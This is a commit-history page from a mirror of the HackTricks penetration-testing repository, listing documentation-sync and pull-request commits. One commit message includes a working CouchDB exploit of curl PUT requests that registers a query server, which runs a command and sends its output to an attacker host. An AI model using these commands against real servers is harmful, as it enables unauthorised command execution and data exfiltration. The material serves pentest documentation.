1
2
Fork 0
mirror of https://github.com/carlospolop/hacktricks.git synced 2023-12-14 19:12:55 +01:00
Commit graph

1237 commits

Author SHA1 Message Date
CPol 5f83c0bdad
GitBook: [master] 3 pages and 3 assets modified 2021-05-27 11:24:11 +00:00
CPol 6d5010301b
GitBook: [master] one page and one asset modified 2021-05-27 11:01:09 +00:00
CPol 9e80c3be33
GitBook: [master] 472 pages modified 2021-05-27 10:20:50 +00:00
CPol 003cba43da
GitBook: [master] 4 pages and 4 assets modified 2021-05-26 23:49:36 +00:00
CPol 7d9a8ddc9a
GitBook: [master] one page and 3 assets modified 2021-05-26 22:50:34 +00:00
CPol cb8be9a38c
GitBook: [master] one page modified 2021-05-26 11:19:55 +00:00
CPol d77b102952
GitBook: [master] one page modified 2021-05-26 11:18:48 +00:00
CPol e7afb9504e
GitBook: [master] one page modified 2021-05-26 09:08:21 +00:00
CPol 487861e0f3
GitBook: [master] 473 pages modified 2021-05-25 23:11:03 +00:00
CPol fd5d0989f3
GitBook: [master] 7 pages and 8 assets modified 2021-05-25 23:07:25 +00:00
Carlos Polop 6cd7d66ee5
Merge pull request #116 from jeffbencteux/patch-1
Command execution via query_servers fix
2021-05-26 00:06:07 +01:00
Carlos Polop a2d1f6c4da
Merge pull request #115 from Vincevrp/patch-2
Add missing hyphen
2021-05-25 23:52:47 +01:00
Carlos Polop c8b8631ec8
Merge pull request #114 from Vincevrp/patch-1
Link to English kubectl install documentation
2021-05-25 23:52:23 +01:00
CPol 353938b47c
GitBook: [master] 5 pages and 10 assets modified 2021-05-25 22:52:07 +00:00
Carlos Polop b4af99059c
Merge pull request #113 from shivankar-madaan/patch-1
remove duplicate line
2021-05-25 23:51:51 +01:00
Carlos Polop 97c49bdb7a
Merge pull request #112 from clem9669/patch-5
Update Pentesting SNMP
2021-05-25 23:51:28 +01:00
Carlos Polop 097da68802
Merge pull request #111 from AssassinUKG/patch-2
Created 1080
2021-05-25 23:46:44 +01:00
CPol f60b8d7ea8
GitBook: [master] one page modified 2021-05-24 15:55:07 +00:00
Jeffrey Bencteux e505cc2b55
Command execution via query_servers fix
Hey man, I got a working example, I think the issue is that you are requesting your view with POST rather than PUT method. Following works for me:

curl -X PUT 'http://<target_ip>:5984/_node/couchdb@localhost/_config/query_servers/cmd' -d '"id | curl http://<attacker_ip>:<port> -d @-"'
curl -X PUT 'http://<target_ip>:5984/testbed'
curl -X PUT 'http://<target_ip>:5984/testbed/whatever' -d '{"_id":"770855a97726d5666d70a22173005c77"}'
curl -X PUT http://<target_ip>:5984/testbed/_design/whatever -d '{"_id":"_design/test","views":{"anything":{"map":""} },"language":"cmd"}' -H "Content-Type: application/json"
2021-05-24 10:43:15 +02:00
Vince 92096e6cd1 Add missing hyphen
The "enumeration from a pod" command example to get all services is missing a hyphen.
2021-05-23 23:24:28 +02:00
Vince 44e0145e11
Link to English kubectl install documentation
The Kubernetes "enumeration from a pod" documentation links to Spanish instructions to install kubectl. This commit changes the URL to the English documentation.
2021-05-23 21:11:01 +00:00
CPol 3876d7fb90
GitBook: [master] one page modified 2021-05-21 17:16:33 +00:00
CPol 757acc677c
GitBook: [master] 36 pages modified 2021-05-21 17:13:19 +00:00
CPol 2f22c14f27
GitBook: [master] 3 pages modified 2021-05-21 17:12:21 +00:00
CPol 6c9a0f3975
GitBook: [master] 7 pages modified 2021-05-21 16:38:18 +00:00
CPol 23948173f0
GitBook: [master] 3 pages modified 2021-05-21 11:41:36 +00:00
CPol fc77b585a9
GitBook: [master] one page modified 2021-05-20 22:43:37 +00:00
CPol 319542ab0f
GitBook: [master] 3 pages modified 2021-05-20 15:02:14 +00:00
CPol e15860f1d3
GitBook: [master] 467 pages and 2 assets modified 2021-05-20 12:17:20 +00:00
shivankar-madaan 60360dd0c7
remove duplicate line
just shhgit was mentioned twice
2021-05-20 10:38:12 +02:00
CPol d2d0b1333e
GitBook: [master] one page and 7 assets modified 2021-05-19 23:28:34 +00:00
CPol 7b6767a4f8
GitBook: [master] 3 pages modified 2021-05-19 16:11:33 +00:00
clem9669 430a952347
Update Pentesting SNMP
Adding an extra command to gather information about users
2021-05-19 12:49:04 +00:00
CPol 89c55b14cd
GitBook: [master] 463 pages modified 2021-05-18 23:29:06 +00:00
CPol 11e285456e
GitBook: [master] one page and 2 assets modified 2021-05-18 23:15:50 +00:00
CPol d4daa0a69c
GitBook: [master] 3 pages modified 2021-05-18 12:34:46 +00:00
CPol 71e52daa5d
GitBook: [master] one page modified 2021-05-18 08:18:19 +00:00
CPol 1e0f49f6e8
GitBook: [master] one page modified 2021-05-18 08:12:15 +00:00
CPol 0bf986c68a
GitBook: [master] one page and 5 assets modified 2021-05-17 22:56:23 +00:00
CPol 3926f377c2
GitBook: [master] 4 pages modified 2021-05-17 19:08:47 +00:00
CPol 17cd871714
GitBook: [master] one page modified 2021-05-17 16:11:05 +00:00
CPol 47ac5534af
GitBook: [master] 2 pages and 16 assets modified 2021-05-16 18:23:48 +00:00
CPol 2c779ca982
GitBook: [master] one page modified 2021-05-16 14:24:45 +00:00
CPol 9ccaaf1f6c
GitBook: [master] one page modified 2021-05-15 23:21:47 +00:00
CPol 36c20843d1
GitBook: [master] 461 pages modified 2021-05-15 12:48:28 +00:00
CPol 32b68b5fe9
GitBook: [master] 3 pages and one asset modified 2021-05-15 09:00:32 +00:00
CPol c46409a533
GitBook: [master] one page modified 2021-05-14 22:26:05 +00:00
CPol 3c87a2d5d8
GitBook: [master] 2 pages modified 2021-05-14 22:25:03 +00:00
CPol 91e791577e
GitBook: [master] 6 pages and 4 assets modified 2021-05-14 19:31:19 +00:00
CPol 8d827274d9
GitBook: [master] 461 pages and 2 assets modified 2021-05-14 18:57:48 +00:00